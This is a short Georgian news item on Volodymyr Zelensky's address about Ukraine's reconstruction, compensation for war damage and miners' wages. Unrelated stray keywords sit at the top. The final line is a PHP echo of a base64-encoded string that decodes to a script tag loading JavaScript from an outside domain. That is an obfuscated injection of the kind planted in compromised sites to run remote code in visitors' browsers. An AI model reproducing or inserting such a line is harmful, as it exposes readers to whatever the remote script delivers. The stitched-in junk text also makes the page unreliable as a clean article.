celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა, ვოლოდიმერ ზელინსკიმ ტრადიციულ, შემაჯამებელ ვიდეომიმართვაში, სამომავლო გეგმებზე და დაზარალებული მოქალაქეების ზარალის ანაზღაურებაზე ისაუბრა. 
 
"უკრაინის აღმშენებლობის პროგრამის ფარგლებში ჩვენი პარტნიორები საუკეთესო კომპანიებითა და სპეციალისტებით დახმარებას გვთავაზობენ. ეს სწრაფი აღმშენებლობის გარანტი იქნება. როგორც შემატყობინეს, დანიაში ამ პოზიციას პოზიტიურად გამოეხმაურნენ. 
 
დღეიდან, მუშაობა დაიწყო ჩვენს მიერ შემუშავებულმა ახალმა სისტემამ. როგორც იცით, ჩვენ მოქალაქეებს ომის შედეგად მიღებულ ყველა ზარალს ავუნაზღაურებთ, ეს იქნება სახლი, ბინა თუ სხვა სახის ზიანი. თითოეულ მოქალაქეს ამ ორგანოში განცხადების დაწერა უკვე შეუძლია. განაცხადის შეტანა მობილურის საშუალებითაც შესაძლებელია. ყველაზე მთავარია, რომ ჩვენი სახელმწიფო თითოეულ დაკარგულ სანტიმეტრს აანაზღაურებს. 
 
დღეს ჩვენი მეშახტეებისთვის 426 მილიონი გრივნა გადავრიცხეთ, რომლებიც ამ თანხას ხელფასების სახით მიიღებენ." – განაცხადა ზელენსკიმ. 
 
793
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");